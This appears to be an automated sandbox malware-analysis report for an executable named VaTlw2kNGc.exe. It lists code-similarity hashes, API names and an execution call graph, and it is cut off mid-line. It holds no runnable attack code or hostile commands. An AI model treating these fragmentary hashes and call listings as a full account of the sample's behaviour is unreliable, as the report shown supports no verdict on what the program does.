                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ByteCharMultiWide
                                                                                                    • String ID: Error$Error/warning (ANSI fallback)
                                                                                                    • API String ID: 1878133881-653037927
                                                                                                    • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                    • Instruction ID: 0c7488aba16d5498f09aaa62c641d4c9b372210183e5b25577ab8129fa3ad34a
                                                                                                    • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                    • Instruction Fuzzy Hash: 21115B72628A85C1EB28AF11F451BA9B378FB44B84FE05136DA5D47A44DF3CDA09CB50
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                    • String ID:
                                                                                                    • API String ID: 2718003287-0
                                                                                                    • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                    • Instruction ID: f174d3c389e2c0b0b2f8f5f514f608d6f383f6626e70715dcb2cd3081e8b72ff
                                                                                                    • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                    • Instruction Fuzzy Hash: 86D11672B08A81C9E714DF79E4802AC77B2FB54798BA44236CE5E97F99DE38D416C310
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_isindst
                                                                                                    • String ID:
                                                                                                    • API String ID: 4170891091-0
                                                                                                    • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                    • Instruction ID: 84243b513a2ac659c958ae43a10907d50ce1a4eaebe8ab7aaba856db1f947a85
                                                                                                    • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                    • Instruction Fuzzy Hash: 7351D772F04112CAEB1CEF64EA556BCA7B2AB14359FA00135DD1E53AE9DF3CA502C750
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                    • String ID:
                                                                                                    • API String ID: 2780335769-0
                                                                                                    • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                    • Instruction ID: 3b67deaf55b2bf900068082c1cd07fe594c5191187d35b6648dc90dcc298683b
                                                                                                    • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                    • Instruction Fuzzy Hash: 9B517C22A08651CAFB18EF71E5503BDA3B2EB48B58FA48535DE0987689DF3CD481C760
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$DialogInvalidateRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 1956198572-0
                                                                                                    • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                    • Instruction ID: dcba193661712412712dde0f1e64ee6958b8336f32026eab4c405f1ba52e37fb
                                                                                                    • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                    • Instruction Fuzzy Hash: F911A921F08142C2FA5DAF6AF64427992B1EF88B80FE49531DE4947F9DCD2CD8C6C624
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                    • String ID: ?
                                                                                                    • API String ID: 1286766494-1684325040
                                                                                                    • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                    • Instruction ID: 1bf283dd3ee79d78002088e2a418766c89ac584c6f21bf7504ce18dd8197fdbb
                                                                                                    • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                    • Instruction Fuzzy Hash: 1E41D512B0C682C6FB28AF25B501779E770EB91BA4FA44235EE5D07AD9DF3CD4418B10
                                                                                                    APIs
                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B835E
                                                                                                      • Part of subcall function 00007FF7691B9C58: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
                                                                                                      • Part of subcall function 00007FF7691B9C58: GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7691ABEC5), ref: 00007FF7691B837C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
                                                                                                    • String ID: C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                    • API String ID: 3976345311-3782499776
                                                                                                    • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                    • Instruction ID: 8ec0a577db9cf52c414b7e13bce90e6b4b47b3d0aa1467e576bbd5d2d877450a
                                                                                                    • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                    • Instruction Fuzzy Hash: 05416036A08B52C6E719FF25F4911BCB3B6EB45B94FA54035EA4E43B99DE3CD4418320
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                    • String ID: .$:
                                                                                                    • API String ID: 2020911589-4202072812
                                                                                                    • Opcode ID: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
                                                                                                    • Instruction ID: b54f97da19a92e2e943bc31fb2dd757af3d90c5cbf48a949b5ab0268f2b09081
                                                                                                    • Opcode Fuzzy Hash: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
                                                                                                    • Instruction Fuzzy Hash: 38416026F08752D8FB14FFB1A8501BC6675AF14758FA40039EE5D67B8DDF38A4469320
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID: U
                                                                                                    • API String ID: 442123175-4171548499
                                                                                                    • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                    • Instruction ID: c3cd2968c8eb6ef4574f38d2bf459be36a180e7b9a29f56cbc44d6714322a635
                                                                                                    • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                    • Instruction Fuzzy Hash: 7A41A422B18A85C5EB24AF25F4443AAB771FB98794FA44035EE4D87B98DF3CD441CB50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory
                                                                                                    • String ID: :
                                                                                                    • API String ID: 1611563598-336475711
                                                                                                    • Opcode ID: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                                    • Instruction ID: 5dc2ea9728abb61aef2ae4b63c10a72cfd873f7b20e709e1f2465431cfeb90c0
                                                                                                    • Opcode Fuzzy Hash: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                                    • Instruction Fuzzy Hash: 3B21B622B08681C1EB68AF15E04427DF3B2FB84B84FE54135D68D43688DF7CDA49CBA1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                    • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                    • Instruction ID: 94ce0bdcc1f81004d8b6861d16c18a4ddd6435a2bb7dcabd40a7b74d59a568f4
                                                                                                    • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                    • Instruction Fuzzy Hash: 30114936618B84C2EB659F25F540269B7E5FB88B84FA84230DA8D07B68DF3CD951CB00
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                                                                    • String ID: :
                                                                                                    • API String ID: 2595371189-336475711
                                                                                                    • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                    • Instruction ID: fb77c04894fd7e2f1205b4b6178695d2e6e481c56ab2a1d07d4e951f78faeb66
                                                                                                    • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                    • Instruction Fuzzy Hash: CB01DB26A0C246C6FB2CBF60B46137EA3B0EF48708FE40036D55D82799DE3CE504CA20

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:5.5%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:674
                                                                                                    Total number of Limit Nodes:15
                                                                                                    execution_graph 22385 7ff7691a6340 49 API calls _log10_special 22344 7ff7691ac640 54 API calls 22387 7ff7691abf40 38 API calls 2 library calls 21829 7ff7691b4938 21830 7ff7691b4952 21829->21830 21831 7ff7691b496f 21829->21831 21854 7ff7691b43d4 11 API calls _get_daylight 21830->21854 21831->21830 21833 7ff7691b4982 CreateFileW 21831->21833 21835 7ff7691b49b6 21833->21835 21836 7ff7691b49ec 21833->21836 21834 7ff7691b4957 21855 7ff7691b43f4 11 API calls _get_daylight 21834->21855 21857 7ff7691b4a8c 59 API calls 3 library calls 21835->21857 21858 7ff7691b4f14 46 API calls 3 library calls 21836->21858 21840 7ff7691b49f1 21843 7ff7691b4a20 21840->21843 21844 7ff7691b49f5 21840->21844 21841 7ff7691b495f 21856 7ff7691b9bf0 37 API calls _invalid_parameter_noinfo 21841->21856 21842 7ff7691b49c4 21846 7ff7691b49e1 CloseHandle 21842->21846 21847 7ff7691b49cb CloseHandle 21842->21847 21860 7ff7691b4cd4 51 API calls 21843->21860 21859 7ff7691b4368 11 API calls 2 library calls 21844->21859 21850 7ff7691b496a 21846->21850 21847->21850 21851 7ff7691b4a2d 21861 7ff7691b4e10 21 API calls _fread_nolock 21851->21861 21853 7ff7691b49ff 21853->21850 21854->21834 21855->21841 21856->21850 21857->21842 21858->21840 21859->21853 21860->21851 21861->21853 22388 7ffe13302470 14 API calls 2 library calls 21865 7ff7691aab3c 21866 7ff7691a9e3a 21865->21866 21868 7ff7691a9eb6 21866->21868 21869 7ff7691ab0b0 21866->21869 21870 7ff7691ab0d3 21869->21870 21871 7ff7691ab0f1 memcpy_s 21869->21871 21873 7ff7691bc90c 21870->21873 21871->21868 21874 7ff7691bc957 21873->21874 21878 7ff7691bc91b _get_daylight 21873->21878 21881 7ff7691b43f4 11 API calls _get_daylight 21874->21881 21875 7ff7691bc93e RtlAllocateHeap 21877 7ff7691bc955 21875->21877 21875->21878 21877->21871 21878->21874 21878->21875 21880 7ff7691c28a0 EnterCriticalSection LeaveCriticalSection _get_daylight 21878->21880 21880->21878 21881->21877 22390 7ffe13310490 14 API calls __CxxRegisterExceptionObject 22391 7ff7691acd48 45 API calls 22393 7ffe13306260 InterlockedFlushSList free 22349 7ff7691a6420 10 API calls 22350 7ffe1330f9a0 43 API calls __CxxRegisterExceptionObject 22395 7ff7691b4720 76 API calls __free_lconv_mon 22396 7ffe13302a59 abort 22398 7ffe1330604f RtlPcToFileHeader RtlPcToFileHeader RaiseException 22351 7ff7691a2030 21 API calls 22399 7ff7691a7b30 Sleep 22352 7ff7691bb830 47 API calls _isindst 22401 7ff7691c6f30 65 API calls 22402 7ffe13304bef 15 API calls 5 library calls 22403 7ff7691acb80 10 API calls 2 library calls 22404 7ff7691c0b84 44 API calls 5 library calls 22355 7ff7691ac084 GetModuleHandleW __CxxCallCatchBlock 21810 7ff7691b8c79 21822 7ff7691b96e8 21810->21822 21812 7ff7691b8c7e 21813 7ff7691b8cef 21812->21813 21814 7ff7691b8ca5 GetModuleHandleW 21812->21814 21815 7ff7691b8b7c 11 API calls 21813->21815 21814->21813 21820 7ff7691b8cb2 21814->21820 21816 7ff7691b8d2b 21815->21816 21817 7ff7691b8d32 21816->21817 21818 7ff7691b8d48 11 API calls 21816->21818 21819 7ff7691b8d44 21818->21819 21820->21813 21821 7ff7691b8da0 GetModuleHandleExW GetProcAddress FreeLibrary 21820->21821 21821->21813 21827 7ff7691ba460 45 API calls 3 library calls 21822->21827 21824 7ff7691b96f1 21828 7ff7691b9814 45 API calls __CxxCallCatchBlock 21824->21828 21827->21824 22356 7ffe13304e74 21 API calls 4 library calls 22405 7ffe133044b4 free 22407 7ff7691c2790 GetProcessHeap 22360 7ff7691b9060 11 API calls 22361 7ff7691c7060 CloseHandle 22410 7ffe13306490 9 API calls __vcrt_getptd_noinit 21882 7ff7691abf5c 21903 7ff7691ac12c 21882->21903 21885 7ff7691ac0a8 22022 7ff7691ac44c 7 API calls 2 library calls 21885->22022 21886 7ff7691abf78 __scrt_acquire_startup_lock 21888 7ff7691ac0b2 21886->21888 21893 7ff7691abf96 __scrt_release_startup_lock 21886->21893 22023 7ff7691ac44c 7 API calls 2 library calls 21888->22023 21890 7ff7691abfbb 21891 7ff7691ac0bd __CxxCallCatchBlock 21892 7ff7691ac041 21909 7ff7691ac594 21892->21909 21893->21890 21893->21892 22019 7ff7691b8e44 45 API calls 21893->22019 21895 7ff7691ac046 21912 7ff7691a1000 21895->21912 21900 7ff7691ac069 21900->21891 22021 7ff7691ac2b0 7 API calls 21900->22021 21902 7ff7691ac080 21902->21890 21904 7ff7691ac134 21903->21904 21905 7ff7691ac140 __scrt_dllmain_crt_thread_attach 21904->21905 21906 7ff7691ac14d 21905->21906 21908 7ff7691abf70 21905->21908 21906->21908 22024 7ff7691acba8 7 API calls 2 library calls 21906->22024 21908->21885 21908->21886 22025 7ff7691c97e0 21909->22025 21913 7ff7691a1009 21912->21913 22027 7ff7691b4794 21913->22027 21915 7ff7691a352b 22034 7ff7691a33e0 21915->22034 21918 7ff7691a3538 21920 7ff7691ab870 _log10_special 8 API calls 21918->21920 21922 7ff7691a372a 21920->21922 22020 7ff7691ac5d8 GetModuleHandleW 21922->22020 21923 7ff7691a3736 21925 7ff7691a3f70 108 API calls 21923->21925 21924 7ff7691a356c 21926 7ff7691a1bf0 49 API calls 21924->21926 21927 7ff7691a3746 21925->21927 21942 7ff7691a3588 21926->21942 21928 7ff7691a3785 21927->21928 22124 7ff7691a76a0 21927->22124 22133 7ff7691a25f0 53 API calls _log10_special 21928->22133 21932 7ff7691a3778 21934 7ff7691a379f 21932->21934 21935 7ff7691a377d 21932->21935 21933 7ff7691a365f __std_exception_copy 21936 7ff7691a3844 21933->21936 21939 7ff7691a7e10 14 API calls 21933->21939 21938 7ff7691a1bf0 49 API calls 21934->21938 21937 7ff7691af36c 74 API calls 21935->21937 22137 7ff7691a3e90 49 API calls 21936->22137 21937->21928 21941 7ff7691a37be 21938->21941 21943 7ff7691a36ae 21939->21943 21948 7ff7691a18f0 115 API calls 21941->21948 22096 7ff7691a7e10 21942->22096 22122 7ff7691a7f80 40 API calls __std_exception_copy 21943->22122 21944 7ff7691a3852 21946 7ff7691a3871 21944->21946 21947 7ff7691a3865 21944->21947 21951 7ff7691a1bf0 49 API calls 21946->21951 22138 7ff7691a3fe0 21947->22138 21952 7ff7691a37df 21948->21952 21949 7ff7691a36bd 21953 7ff7691a380f 21949->21953 21955 7ff7691a36cf 21949->21955 21973 7ff7691a3805 __std_exception_copy 21951->21973 21952->21942 21954 7ff7691a37ef 21952->21954 22135 7ff7691a8400 58 API calls _log10_special 21953->22135 22134 7ff7691a25f0 53 API calls _log10_special 21954->22134 21959 7ff7691a1bf0 49 API calls 21955->21959 21957 7ff7691a86b0 2 API calls 21961 7ff7691a389e SetDllDirectoryW 21957->21961 21962 7ff7691a36f1 21959->21962 21960 7ff7691a3814 22136 7ff7691a7c40 84 API calls 2 library calls 21960->22136 21966 7ff7691a38c3 21961->21966 21967 7ff7691a36fc 21962->21967 21962->21973 21968 7ff7691a3a50 21966->21968 22141 7ff7691a6560 53 API calls 21966->22141 22123 7ff7691a25f0 53 API calls _log10_special 21967->22123 21974 7ff7691a3a5a PostMessageW GetMessageW 21968->21974 21975 7ff7691a3a7d 21968->21975 21971 7ff7691a3834 21971->21936 21971->21973 21972 7ff7691a38d5 22142 7ff7691a6b00 118 API calls 2 library calls 21972->22142 21973->21957 21974->21975 22109 7ff7691a3080 21975->22109 21977 7ff7691a38ea 21979 7ff7691a3947 21977->21979 21981 7ff7691a3901 21977->21981 22143 7ff7691a65a0 121 API calls _log10_special 21977->22143 21979->21968 21986 7ff7691a395c 21979->21986 21993 7ff7691a3905 21981->21993 22144 7ff7691a6970 91 API calls 21981->22144 22148 7ff7691a30e0 122 API calls 2 library calls 21986->22148 21987 7ff7691a3916 21987->21993 22145 7ff7691a6cd0 54 API calls 21987->22145 21991 7ff7691a3aa3 21992 7ff7691a3964 21992->21918 21995 7ff7691a396c 21992->21995 21993->21979 22146 7ff7691a2870 53 API calls _log10_special 21993->22146 22149 7ff7691a83e0 LocalFree 21995->22149 21997 7ff7691a393f 22147 7ff7691a6780 FreeLibrary 21997->22147 22019->21892 22020->21900 22021->21902 22022->21888 22023->21891 22024->21908 22026 7ff7691ac5ab GetStartupInfoW 22025->22026 22026->21895 22030 7ff7691be790 22027->22030 22028 7ff7691be7e3 22151 7ff7691b9b24 37 API calls 2 library calls 22028->22151 22030->22028 22031 7ff7691be836 22030->22031 22152 7ff7691be668 71 API calls _fread_nolock 22031->22152 22033 7ff7691be80c 22033->21915 22153 7ff7691abb70 22034->22153 22037 7ff7691a3438 22155 7ff7691a85a0 FindFirstFileExW 22037->22155 22038 7ff7691a341b 22160 7ff7691a29e0 51 API calls _log10_special 22038->22160 22042 7ff7691a34a5 22163 7ff7691a8760 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 22042->22163 22043 7ff7691a344b 22161 7ff7691a8620 